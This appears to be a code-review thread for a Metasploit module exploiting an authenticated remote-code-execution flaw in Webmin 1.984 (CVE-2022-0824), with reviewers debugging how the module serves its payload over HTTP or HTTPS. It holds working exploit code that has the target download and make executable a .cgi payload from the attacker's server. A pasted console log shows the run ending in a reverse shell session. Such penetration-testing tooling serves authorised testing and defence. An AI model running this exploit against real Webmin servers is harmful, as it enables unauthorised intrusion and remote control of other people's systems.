modules/exploits/linux/http/webmin_file_manager_rce.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Webmin
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Webmin File Manager RCE',
+        'Description' => %q{
+          In Webmin version 1.984, any authenticated low privilege user without access rights to
+          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and
+          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
+          functionalities in the file manager.
+        },
+        'Author' => [
+          'faisalfs10x', # discovery
+          'jheysel-r7'   # module
+        ],
+        'References' => [
+          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit
+          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit
+          [ 'CVE', '2022-0824']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-02-26',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),
+        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])
+      ]
+    )
+  end
+
+  def check
+    webmin_check('1.984')
+  end
+
+  def login
+    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])
+  end
+
+  def download_remote_url
+    print_status('Fetching payload from HTTP server')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'data' => 'link=' + get_uri.gsub('https', 'http') + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
```

Comment:
`get_uri` returns `https://...` when `datastore['SSL'] = true `
`get_uri` returns `http://...` when `datastore['SSL'] = false`

However the method `start_service` that I call in the beginning of the exploit method spins up an http server to host the payload. Regardless of `datastore['SSL']`, it always uses `http`:
`[*] Using URL: http://172.16.199.1:8080/oPf0JLOrP6`

This was causing problems here. If this is just me not using things right please let me know, if it looks like a defect I'll file one a try to fix

Reply:
There's no way to pass in options either. Not sure why, but `start_service()` isn't honoring datastore options currently:

https://github.com/rapid7/metasploit-framework/blob/7005b28859425aa8cd378e1bf819a31b73bb2405/lib/msf/core/exploit/remote/http_server.rb#L104-L126

Reply:
It looks like the command stager is the culprit here:

<details><summary>Output</summary>

```
msf6 exploit(linux/http/webmin_file_manager_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/pJkV98xXW
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[-] Exploit aborted due to failure: unexpected-reply: Unable to download .cgi payload from http server
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/webmin_file_manager_rce) > reload
[*] Reloading module...
msf6 exploit(linux/http/webmin_file_manager_rce) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/webmin_file_manager_rce.rb b/modules/exploits/linux/http/webmin_file_manager_rce.rb
index 1952791926..935b3f7676 100644
--- a/modules/exploits/linux/http/webmin_file_manager_rce.rb
+++ b/modules/exploits/linux/http/webmin_file_manager_rce.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HTTP::Webmin
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -81,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),
       'method' => 'POST',
       'keep_cookies' => true,
-      'data' => 'link=' + get_uri.gsub('https', 'http') + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
+      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
       'headers' => {
         'Accept' => 'application/json, text/javascript, */*; q=0.01',
         'Accept-Encoding' => 'gzip, deflate',
msf6 exploit(linux/http/webmin_file_manager_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/webmin_file_manager_rce) > 
[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: https://192.168.140.1:8080/Ujm6PxP8
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] 192.168.140.226  webmin_file_manager_rce - Request 'GET /Ujm6PxP8.cgi'
[*] 192.168.140.226  webmin_file_manager_rce - Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[!] This exploit may require manual cleanup of '/usr/share/webmin/Ujm6PxP8.cgi' on the target
[*] Server stopped.
[+] Deleted /usr/share/webmin/Ujm6PxP8.cgi
[*] Command shell session 2 opened (192.168.140.1:4444 -> 192.168.140.226:46150) at 2022-10-26 18:12:39 -0500
```

</details>

The CmdStager::Http mixin's `start_service()` method is getting called instead.  The value of the `CMDSTAGER::SSL` datastore option is set to `:ssl` in the opts hash in the command stager mixin and is then used to set the `datastore['SSL']` option when it calls the HttpServer's `start_service()` method.

https://github.com/rapid7/metasploit-framework/blob/fa28131de7c5844ecf65512df9fc18fe3eafc6b7/lib/msf/core/exploit/cmd_stager/http.rb#L14-L25

It doesn't look like the command stager mixin is used in this module, so you can just remove that and the `gsub()` fix from earlier.

Reply:
Thanks for investigating this @space-r7! I've made some changes and retested the module works with both SSL enabled and disabled.